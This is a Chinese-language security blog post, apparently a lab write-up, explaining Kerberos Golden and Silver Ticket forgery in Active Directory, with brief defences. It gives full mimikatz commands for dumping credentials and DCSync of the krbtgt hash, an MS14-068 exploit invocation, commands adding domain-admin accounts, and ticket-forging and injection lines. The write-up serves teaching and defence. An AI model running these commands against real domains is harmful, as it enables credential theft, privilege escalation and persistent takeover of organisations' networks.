

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/logo.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="永安寺">
  <meta name="keywords" content="">
  
  <title>黄金票据和白银票据 - Victory</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.6.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"txluck.github.io","root":"/","version":"1.8.10","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"NnQfFjLx8ctoF1RbDVgWqADt-gzGzoHsz","app_key":"0Lsfi2upctErQTQC8xHAMnIs","server_url":"https://nnqffjlx.lc-cn-n1-shared.com"}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Victory's Note</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="黄金票据和白银票据">
              
            </span>

            
              <div class="mt-3">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-author" aria-hidden="true"></i>
      永安寺
    </span>
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-03-04 21:56" pubdate>
        2022年3月4日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      3k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      35
       分钟
    </span>
  

  
  
    
      <!-- LeanCloud 统计文章PV -->
      <span id="leancloud-page-views-container" class="post-meta" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="leancloud-page-views"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">黄金票据和白银票据</h1>
            
            <div class="markdown-body">
              <h2 id="黄金票据（Golden-Ticket）"><a href="#黄金票据（Golden-Ticket）" class="headerlink" title="黄金票据（Golden Ticket）"></a>黄金票据（Golden Ticket）</h2><p>Kerberos的认证流程就不多介绍了</p>
<h3 id="原理："><a href="#原理：" class="headerlink" title="原理："></a>原理：</h3><p>在AS_REQ &amp; AS_REP中，用户使用自身hash加密时间戳发送给KDC，KDC验证成功后返回用krbtgt hash加密的TGT票据。如果我们有krbtgt的hash，就可以自己给自己签发任意用户的tgt票据。</p>
<h3 id="利用前提："><a href="#利用前提：" class="headerlink" title="利用前提："></a>利用前提：</h3><ul>
<li>拿到域控(没错就是拿到域控QAQ),适合做权限维持</li>
<li>有krbtgt用户的hash值(aeshash ntlmhash等都可以,后面指定一下算法就行了)</li>
</ul>
<h3 id="条件要求："><a href="#条件要求：" class="headerlink" title="条件要求："></a>条件要求：</h3><ul>
<li>域名</li>
<li>域的SID 值</li>
<li>域的KRBTGT账户NTLM密码哈希</li>
<li>伪造用户名</li>
</ul>
<h3 id="实验流程"><a href="#实验流程" class="headerlink" title="实验流程"></a>实验流程</h3><p>金票的生成需要用到 krbtgt 的密码 HASH 值，可以通过 mimikatz 中的 lsadump::dcsync /domain:yunying.lab /user:krbtgt 命令获取 krbtgt 的值。如果已经通过其他方 式获取到了 KRBTGT HASH 也可以直接进行下一步。</p>
<p>因为本地环境原因 没复现起 就参考的：<a target="_blank" rel="noopener" href="https://www.jianshu.com/p/4936da524040">https://www.jianshu.com/p/4936da524040</a></p>
<h4 id="一、伪造凭据，提升域内普通用户的权限"><a href="#一、伪造凭据，提升域内普通用户的权限" class="headerlink" title="一、伪造凭据，提升域内普通用户的权限"></a>一、伪造凭据，提升域内普通用户的权限</h4><p>我们现在以一个本地administrator用户登录域内的一个主机中。</p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214010856407.png" srcset="/img/loading.gif" lazyload alt="image-20220214010856407"></p>
<p>通过命令：net config workstation,可知域名为：cyberpeace和其他信息。</p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214010910320.png" srcset="/img/loading.gif" lazyload alt="image-20220214010910320"></p>
<p>通过命令：nltest /dsgetdc:域名,可知DC主机名为：scene。</p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214010924517.png" srcset="/img/loading.gif" lazyload alt="image-20220214010924517"></p>
<p>上传mimikatz,以管理员权限运行CMD,再去执行mimikatz：</p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs vim">mimikatz.<span class="hljs-keyword">exe</span> <span class="hljs-string">&quot;privilege::debug&quot;</span> <span class="hljs-string">&quot;sekurlsa::logonpasswords&quot;</span> <span class="hljs-string">&quot;exit&quot;</span>&gt;<span class="hljs-built_in">log</span>.txt<br></code></pre></td></tr></table></figure>

<p>打开生成的log.txt可以看到有一个域内用户<code>devuser</code>,且密码是<code>HOTdev123456</code></p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214010941368.png" srcset="/img/loading.gif" lazyload alt="image-20220214010941368"></p>
<p>使用用户devuser登录到域内,whoami查看下当前用户为devuser：</p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214010954297.png" srcset="/img/loading.gif" lazyload alt="image-20220214010954297"></p>
<p>这里利用MS14-068来提权,先检查下是否有MS14-068, CVE编号CVE-2014-6324,补丁为 3011780 ： systeminfo |find “3011780”,如果返回为空就说明没有打补丁,存在漏洞,需要注意的是域内普通用户提权成功后是有时效性的。</p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214011008677.png" srcset="/img/loading.gif" lazyload alt="image-20220214011008677"></p>
<p>执行：dir /scene.cyberpeace.com/c$，提醒权限不够：</p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214011019977.png" srcset="/img/loading.gif" lazyload alt="image-20220214011019977"></p>
<p>上传mimikatz和MS14-068提权工具，<code>whoami /user</code>或者<code>whoami/all</code>查看devuser用户的suid：</p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214011034788.png" srcset="/img/loading.gif" lazyload alt="image-20220214011034788"></p>
<p>使用MS14-068伪造票据：<br> 执行命令：<code>C:/MS14-068&gt;MS14-068.exe -u devuser@cyberpeace.com -p HOTdev123456 -s S-1-5-21-9 7341123-1865264218-933115267-1108 -d scene.cyberpeace.com</code>，会在当前目录下生成一个凭证。</p>
<p>使用方法：</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs css">ms14-<span class="hljs-number">068</span><span class="hljs-selector-class">.exe</span> -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址 <br></code></pre></td></tr></table></figure>

<p>使用mimikatz清空之前缓存的凭证，导入伪造的凭证：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs cpp">mimikatz <span class="hljs-meta"># kerberos::purge  <span class="hljs-comment">//清空票据</span></span><br>mimikatz <span class="hljs-meta"># kerberos::ptc 票据文件地址</span><br></code></pre></td></tr></table></figure>

<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214011112203.png" srcset="/img/loading.gif" lazyload alt="image-20220214011112203"></p>
<p>再输入<code>dir //scene.cyberpeace.com/c$</code>，发现访问成功，现在我们有域管的权限:</p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214011123670.png" srcset="/img/loading.gif" lazyload alt="image-20220214011123670"></p>
<p>添加域管用户aaa：</p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs csharp">net user aaa Qwe123... /<span class="hljs-keyword">add</span> /domain<br>net <span class="hljs-keyword">group</span> <span class="hljs-string">&quot;Domain Admins&quot;</span> aaa /<span class="hljs-keyword">add</span> /domain<br></code></pre></td></tr></table></figure>



<p><strong>其实这一步 如果有条件的话 直接在域控上操作  就不需要这提权 创建域管了</strong></p>
<h4 id="二、伪造金票"><a href="#二、伪造金票" class="headerlink" title="二、伪造金票"></a>二、伪造金票</h4><p>登录aaa域管用户，执行<code>whoami</code>可以看到是aaa用户：</p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214011312427.png" srcset="/img/loading.gif" lazyload alt="image-20220214011312427"></p>
<p>使用一下命令导出用户krbtgt的hash：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">mimikatz(commandline) <span class="hljs-comment"># privilege::debug</span><br>mimikatz(commandline) <span class="hljs-comment"># lsadump::dcsync /domain:cyberpeace.com /all /csv</span><br>mimikatz(commandline) <span class="hljs-comment"># lsadump::dcsync /domain:cyberpeace.com /user:krbtgt</span><br></code></pre></td></tr></table></figure>

<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214011334600.png" srcset="/img/loading.gif" lazyload alt="image-20220214011334600"></p>
<p>再执行以下命令可以看到krbtgt用户的SID：</p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214011358729.png" srcset="/img/loading.gif" lazyload alt="image-20220214011358729"></p>
<p>利用mimikatz生成金票生成.kirbi文件并保存：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs cpp">mimikatz.exe <span class="hljs-string">&quot;kerberos::golden /admin:system /domain:cyberpeace.com /sid:S-1-5-21-97341123-1865264218-933115267 /krbtgt:95972cdf7b8dde854e74c1871f6d80a0 /ticket:ticket.kirbi&quot;</span> exit<br><br>/admin：伪造的用户名<br>/domain：域名称<br>/sid：SID值，注意是去掉最后一个-后面的值<br>/krbtgt：krbtgt的HASH值<br>/ticket：生成的票据名称    <span class="hljs-comment">//不是写入内存中的命令！</span><br></code></pre></td></tr></table></figure>

<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214011420209.png" srcset="/img/loading.gif" lazyload alt="image-20220214011420209"></p>
<h4 id="三，金票的使用-普通域账户，利用黄金票据，创建域管账户"><a href="#三，金票的使用-普通域账户，利用黄金票据，创建域管账户" class="headerlink" title="三，金票的使用(普通域账户，利用黄金票据，创建域管账户)"></a>三，金票的使用(普通域账户，利用黄金票据，创建域管账户)</h4><p>登录域内普通用户，通过mimikatz中的kerberos::ptt功能将ticket.kirbi导入内存中。</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs css">mimikatz # kerberos::purge         <br>mimikatz # kerberos::ptt ticket.kirbi<br></code></pre></td></tr></table></figure>

<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214011457670.png" srcset="/img/loading.gif" lazyload alt="image-20220214011457670"></p>
<p>此时尝试创建一个ccc的域管账号，命令执行成功：</p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214011511599.png" srcset="/img/loading.gif" lazyload alt="image-20220214011511599"></p>
<h4 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h4><p>防御措施如下：</p>
<ul>
<li>限制域管理员登录到除域控制器和少数管理服务器以外的任何其他计算机（不要让其他管理员登录到这些服务器）将所有其他权限委派给自定义管理员组。这大大降低了攻击者访问域控制器的Active Directory的ntds.dit。如果攻击者无法访问AD数据库（ntds.dit文件），则无法获取到KRBTGT帐户密码</li>
<li>禁用KRBTGT帐户，并保存当前的密码以及以前的密码。KRBTGT密码哈希用于在Kerberos票据上签署PAC并对TGT（身份验证票据）进行加密。如果使用不同的密钥（密码）对证书进行签名和加密，则DC（KDC）通过检查KRBTGT以前的密码来验证</li>
<li>建议定期更改KRBTGT密码（毕竟这是一个管理员帐户）。更改一次，然后让AD备份，并在12到24小时后再次更改它。这个过程应该对系统环境没有影响。这个过程应该是确保KRBTGT密码每年至少更改一次的标准方法</li>
<li>一旦攻击者获得了KRBTGT帐号密码哈希的访问权限，就可以随意创建黄金票据。通过快速更改KRBTGT密码两次，使任何现有的黄金票据（以及所有活动的Kerberos票据）失效。这将使所有Kerberos票据无效，并消除攻击者使用其KRBTGT创建有效金票的能力</li>
</ul>
<h2 id="银票SILVER-TICKET"><a href="#银票SILVER-TICKET" class="headerlink" title="银票SILVER TICKET"></a>银票SILVER TICKET</h2><h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p>如果说黄金票据是伪造的TGT,那么白银票据就是伪造的ST。<br>在Kerberos认证的第三部，Client带着ST和Authenticator3向Server上的某个服务进行请求，Server接收到Client的请求之后,通过自己的Master Key 解密ST,从而获得 Session Key。通过 Session Key 解密 Authenticator3,进而验证对方的身份,验证成功就让 Client 访问server上的指定服务了。<br> 所以我们只需要知道Server用户的Hash就可以伪造出一个ST,且不会经过KDC,从而更加隐蔽，但是伪造的门票只对部分服务起作用,如cifs（文件共享服务），mssql，winrm（windows远程管理），DNS等等</p>
<h3 id="特点"><a href="#特点" class="headerlink" title="特点"></a>特点</h3><p>1.不需要与KDC进行交互 2.需要server的NTLM hash</p>
<p>利用前提：</p>
<ul>
<li>拿到目标机器hash(是目标机,不一定是域控)  相当于server</li>
</ul>
<p>条件要求：</p>
<ul>
<li>域名</li>
<li>域sid</li>
<li>目标服务器FQDN</li>
<li>可利用的服务</li>
<li>服务账号的NTML HASH</li>
<li>需要伪造的用户名</li>
</ul>
<h4 id="二、伪造银票"><a href="#二、伪造银票" class="headerlink" title="二、伪造银票"></a>二、伪造银票</h4><p>先添加的域管账号    这里不一定就要域管   只是实验用的域管</p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs csharp">net user ccc Qwe1234/<span class="hljs-keyword">add</span> /domain<br>net <span class="hljs-keyword">group</span> <span class="hljs-string">&quot;Domain Admins&quot;</span> cccc /<span class="hljs-keyword">add</span> /domain<br></code></pre></td></tr></table></figure>

<p>登录上面创建的域管用户，用管理员权限打开CMD，cd 到 mimikatz 存放的目录，去执行mimikatz的命令，得到SID和NTLM，</p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs vim">mimikatz.<span class="hljs-keyword">exe</span> <span class="hljs-string">&quot;privilege::debug&quot;</span> <span class="hljs-string">&quot;sekurlsa::logonpasswords&quot;</span> <span class="hljs-string">&quot;exit&quot;</span>&gt;<span class="hljs-built_in">log</span>.txt<br></code></pre></td></tr></table></figure>

<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214012709895.png" srcset="/img/loading.gif" lazyload alt="image-20220214012709895"></p>
<p>把HASH文件保存到本地，在重新登录到域内机器的本地账户，将hash文件和mimikatz复制进去：<br>先使用mimikatz清空票据，再导入伪造的票据,具体伪造票据的命令:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">kerberos::golden /domain:cyberpeace.com /sid:S-1-5-21-2718660907-658632824-2072795563 /target:scene.cyberpeace.com /service:cifs /rc4:9a68826fdc2811f20d1f73a471ad7b9a /user:<span class="hljs-built_in">test</span> /ptt<br></code></pre></td></tr></table></figure>

<p>使用方法：<br> <code>kerberos::golden /domain:&lt;域名&gt; /sid:&lt;域 SID&gt; /target:&lt;目标服务器主机名&gt; /service:&lt;服务类型&gt; /rc4:&lt;NTLM Hash&gt; /user:&lt;用户名&gt; /ptt</code></p>
<p>其中的用户名可以随便写</p>
<p>服务类型可以从以下内容中来进行选择，因为我们没有TGT去不断申请ticket，所以只能针对某一些服务来进行伪造</p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214012843399.png" srcset="/img/loading.gif" lazyload alt="image-20220214012843399"></p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214012859781.png" srcset="/img/loading.gif" lazyload alt="image-20220214012859781"></p>
<p>测试一下，成功执行<code>dir //scene.cyberpeace.com/c$</code> ,并且可以创建域管账号:</p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214013019349.png" srcset="/img/loading.gif" lazyload alt="image-20220214013019349"></p>
<h2 id="金票和银票的区别"><a href="#金票和银票的区别" class="headerlink" title="金票和银票的区别"></a>金票和银票的区别</h2><h3 id="获取的权限不同"><a href="#获取的权限不同" class="headerlink" title="获取的权限不同"></a>获取的权限不同</h3><p>金票：伪造的TGT，可以获取任意Kerberos的访问权限<br> 银票：伪造的ST，只能访问指定的服务，如CIFS</p>
<h3 id="认证流程不同"><a href="#认证流程不同" class="headerlink" title="认证流程不同"></a>认证流程不同</h3><p>金票：同KDC交互，但不同AS交互<br> 银票：不同KDC交互，直接访问Server</p>
<h3 id="加密方式不同"><a href="#加密方式不同" class="headerlink" title="加密方式不同"></a>加密方式不同</h3><p>金票：由krbtgt NTLM Hash 加密<br> 银票：由服务账号 NTLM Hash 加密</p>
<p>Golden Ticket 和Silver Ticket都会在日志，不同的是，Golden Ticket会在域控中留下日志，Silver Ticket 仅在目标系统留下日志，因为Silver Ticket 不与KDC产生交互</p>
<h2 id="Enhanced-Golden-Tickets"><a href="#Enhanced-Golden-Tickets" class="headerlink" title="Enhanced Golden Tickets"></a>Enhanced Golden Tickets</h2><p>在 Golden Ticket 部分说明可利用 krbtgt 的密码 HASH 值生成金票，从而能够获取域控权 限同时能够访问域内其他主机的任何服务。但是普通的金票不能够跨域使用，也就是说金票 的权限被限制在当前域内。</p>
<h3 id="普通金票的局限性"><a href="#普通金票的局限性" class="headerlink" title="普通金票的局限性"></a>普通金票的局限性</h3><p>为什么普通金票会被限制只能在当前域内使用？ 在上一篇文章中说到了域树和域林的概念，同时说到 YUNYING.LAB 为其他两个域 （NEWS.YUNYING.LAB 和 DEV.YUNYING.LAB）的根域，根域和其他域的最大的区别就是根域对 整个域林都有控制权。而域正是根据 Enterprise Admins 组（下文会说明）来实现这样的权限 划分。</p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214015124778.png" srcset="/img/loading.gif" lazyload alt="image-20220214015124778"></p>
<p>实验环境</p>
<p>根域：YUNYING.LAB</p>
<p>域控：DC.YUNYING.LAB</p>
<p>子域：NEWS.YUNYING.LAB</p>
<p>域控：NEWSDC.NEWS.YUNYING.LAB</p>
<p>子域：DEV.YUNYING.LAB</p>
<p>域控：DEVDC.DEV.YUNYING.LAB</p>
<p>操作系统均为Windows Server 2008 R2 x64</p>
<p>使用工具：</p>
<p>Mimikatz</p>
<p>实验流程：</p>
<p>首先使用mimikatz在NEWSDC（NEWS.YUNYING.LAB的域控）上生成普通的金票，真实环境会是在域内的主机中，这里方便演示所以在域控中，原理和结果是一样的。</p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214015235826.png" srcset="/img/loading.gif" lazyload alt="image-20220214015235826"></p>
<p>这里使用的是NEWS.YUNYING.LAB域的SID号，访问根域的DC共享文件夹被拒绝。</p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214015248305.png" srcset="/img/loading.gif" lazyload alt="image-20220214015248305"></p>
<p>下面说明下具体原因。</p>
<p><strong>Enterprise Admins组</strong></p>
<p>Enterprise Admins组是域中用户的一个组，只存在于一个林中的根域中，这个组的成员，这里也就是YUNYING.LAB中的Administrator用户（不是本地的Administrator，是域中的Administrator）对域有完全管理控制权。</p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214015302371.png" srcset="/img/loading.gif" lazyload alt="image-20220214015302371"></p>
<p>通过whoami命令在yunying.lab的域控上可以看到Enterprise Admins组的RID为519（最后三位）</p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214015315827.png" srcset="/img/loading.gif" lazyload alt="image-20220214015315827"></p>
<p><strong>Domain Admins组</strong></p>
<p>可以看到在子域中是不存在Enterprise Admins组的，在一个子域中权限最高的组就是Domain Admins组。截图是news.yunying.lab这个子域中的Administrator用户，这个Administrator有当前域的最高权限。</p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214015334730.png" srcset="/img/loading.gif" lazyload alt="image-20220214015334730"></p>
<p>通过whoami命令也可以看到在news.yunying.lab这个子域中没有Enterprise Admins组的SID号。</p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214015351528.png" srcset="/img/loading.gif" lazyload alt="image-20220214015351528"></p>
<p>在子域中使用mimikatz创建的黄金票据不能跨域使用的原因也就在这里，通过whoami可以看到YUNYING.LAB中Enterprise Admins组的SID号是：</p>
<p>S-1-5-21-4249968736-1423802980-663233003-519</p>
<p>而NEWS.YUNYING.LAB域中的SID号是：</p>
<p>S-1-5-21-3641416521-285861825-2863956705-XXX</p>
<p>mimikatz通过/sid选项接收SID号然后在尾部拼接RID号（512,519等），拼接之后生成的Enterprise Admins组的完整SID是：</p>
<p>S-1-5-21-3641416521-285861825-2863956705-519</p>
<p>而这个SID在整个域林中都是不存在的，所以在子域中通过mimikatz生成的金票无法跨域或者是访问其他域的资源。在一个域林中，域控权限不是终点，根域的域控权限才是域渗透的终点。</p>
<h3 id="突破限制"><a href="#突破限制" class="headerlink" title="突破限制"></a>突破限制</h3><p>普通的黄金票据被限制在当前域内，在2015年Black Hat USA中国外的研究者提出了突破域限制的增强版的黄金票据。通过域内主机在迁移时SIDHistory属性中保存的上一个域的SID值制作可以跨域的金票。这里没有迁移，直接拿根域的SID号做演示。</p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214015429835.png" srcset="/img/loading.gif" lazyload alt="image-20220214015429835"></p>
<p>如果知道根域的SID那么就可以通过子域的KRBTGT的HASH值，使用mimikatz创建具有 Enterprise Admins组权限（域林中的最高权限）的票据。环境与上文普通金票的生成相同。</p>
<p>首先我们通过klist purge删除当前保存的Kerberos票据，也可以在mimikatz里通过kerberos::purge来删除。</p>
